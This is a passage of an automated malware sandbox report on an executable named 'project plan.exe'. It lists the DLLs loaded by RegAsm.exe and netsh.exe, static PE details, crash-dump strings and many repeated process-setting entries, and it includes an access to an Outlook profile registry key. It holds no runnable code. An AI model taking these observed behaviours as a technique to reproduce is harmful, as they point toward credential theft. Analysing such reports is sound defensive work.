                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ifmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasmontr.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mfc42u.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: authfwcfg.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpolicyiomgr.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: firewallapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcmonitor.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3cfg.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3api.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: onex.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappcfg.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappprxy.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwcfg.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: hnetmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netshell.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netsetupapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netiohlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: httpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshipsec.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: activeds.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: polstore.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winipsec.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: adsldpc.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: adsldpc.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshwfp.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cabinet.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2pnetsh.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2p.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rpcnsh.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: whhelper.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlancfg.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlanapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wshelper.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wevtapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: peerdistsh.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wcmapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rmclient.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mobilenetworking.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ktmw32.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprmsg.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\project plan.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: C:\Users\user\Desktop\project plan.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: project plan.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: project plan.exeStatic file information: File size 2939959 > 1048576
                Source: project plan.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: project plan.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: Microsoft.VisualBasic.ni.pdb source: WERDE5D.tmp.dmp.7.dr
                Source: Binary string: System.Windows.Forms.pdb source: WERDE5D.tmp.dmp.7.dr
                Source: Binary string: mscorlib.pdb source: WERDE5D.tmp.dmp.7.dr
                Source: Binary string: System.ni.pdbRSDS source: WERDE5D.tmp.dmp.7.dr
                Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WERDE5D.tmp.dmp.7.dr
                Source: Binary string: System.Drawing.pdb source: WERDE5D.tmp.dmp.7.dr
                Source: Binary string: System.Windows.Forms.ni.pdb source: WERDE5D.tmp.dmp.7.dr
                Source: Binary string: System.Drawing.pdbX source: WERDE5D.tmp.dmp.7.dr
                Source: Binary string: mscorlib.ni.pdb source: WERDE5D.tmp.dmp.7.dr
                Source: Binary string: System.Drawing.ni.pdb source: WERDE5D.tmp.dmp.7.dr
                Source: Binary string: System.Core.pdb source: WERDE5D.tmp.dmp.7.dr
                Source: Binary string: System.Windows.Forms.pdb; source: WERDE5D.tmp.dmp.7.dr
                Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WERDE5D.tmp.dmp.7.dr
                Source: Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WERDE5D.tmp.dmp.7.dr
                Source: Binary string: System.Drawing.ni.pdbRSDS source: WERDE5D.tmp.dmp.7.dr
                Source: Binary string: System.Core.pdbH source: WERDE5D.tmp.dmp.7.dr
                Source: Binary string: System.ni.pdb source: WERDE5D.tmp.dmp.7.dr
                Source: Binary string: System.pdb source: WERDE5D.tmp.dmp.7.dr
                Source: Binary string: System.Core.ni.pdbRSDS source: WERDE5D.tmp.dmp.7.dr
                Source: Binary string: Microsoft.VisualBasic.pdb source: WERDE5D.tmp.dmp.7.dr
                Source: Binary string: System.Core.ni.pdb source: WERDE5D.tmp.dmp.7.dr
                Source: C:\Users\user\Desktop\project plan.exeCode function: 0_2_00007FF848F1816B push ebx; retn 5F4Eh0_2_00007FF848F1826A
                Source: C:\Users\user\Desktop\project plan.exeCode function: 0_2_00007FF848F12E65 push eax; ret 0_2_00007FF848F12E1D
                Source: C:\Users\user\Desktop\project plan.exeCode function: 0_2_00007FF848F12D80 push eax; ret 0_2_00007FF848F12E1D
                Source: C:\Users\user\Desktop\project plan.exeCode function: 0_2_00007FF848F100BD pushad ; iretd 0_2_00007FF848F100C1
                Source: C:\Users\user\Desktop\project plan.exeCode function: 0_2_00007FF848FF01AA push esp; retf 4810h0_2_00007FF848FF0312
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_06169157 push es; ret 3_2_061692B8
                Source: C:\Users\user\Desktop\project plan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\project plan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\project plan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\project plan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\project plan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\project plan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\project plan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\project plan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\project plan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\project plan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\project plan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\project plan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\project plan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\project plan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\project plan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\project plan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\project plan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\project plan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\project plan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\project plan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\project plan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\project plan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\project plan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\project plan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\project plan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\project plan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\project plan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\project plan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\project plan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\project plan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\project plan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
